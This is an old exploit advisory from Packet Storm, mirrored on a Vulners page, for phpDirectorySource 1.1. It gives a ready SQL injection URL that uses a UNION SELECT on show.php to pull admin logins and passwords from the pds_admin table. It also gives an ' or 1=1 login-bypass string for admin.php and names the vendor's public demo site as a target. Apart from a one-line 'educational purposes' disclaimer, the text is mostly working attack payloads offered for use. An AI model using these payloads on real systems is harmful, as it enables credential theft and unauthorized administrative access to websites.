Lucene search
K

phpdirsource-sql.txt

🗓️ 05 May 2008 00:00:00Reported by InjEctOrSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

SQL Injection, Admin Login Bypass in phpDirectorySource 1.

Code
`|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
| _ __ __ __ ______ |  
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |  
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |  
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |  
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |  
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |  
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |  
| \ \____/ >> Kings of injection |  
| \/___/ |  
| |  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
  
Title :: SQL Injection and Bypass Administrator Login  
  
  
Author :: InjEctOr [s0f (at) w.cn]  
  
&& FishEr762 [sq7 (at) w.cn]  
  
  
Application :: phpDirectorySource 1.1  
  
Download :: http://www.phpdirectorysource.com/files/pds_ver1_1.zip  
  
Dork 1 :: use your mind :p  
  
  
Greets :: Allah , TrYaG TeaM & Muslims Hackers   
  
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.  
  
  
  
--------------------------------------------[C o n t e x t]-----------------------------------------  
  
  
Expl0!te ::  
  
http://127.0.0.1/[script]/show.php?lid=1'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*  
  
  
i.e.  
http://directory.xxx.com/show.php?lid=104'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*  
  
note:   
used "and 1=0" koz lid is varchar so it's better way to make next query run  
  
--------------  
  
Bypass Administrator Login :  
/directory/admin.php  
  
username field  
' or 1=1 /*  
  
i.e. in demo site (demos always get the 1st shot lol)  
http://www.phpdirectorysource.com/directory/admin.php  
  
  
-------------------------------------------[End of context]----------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
20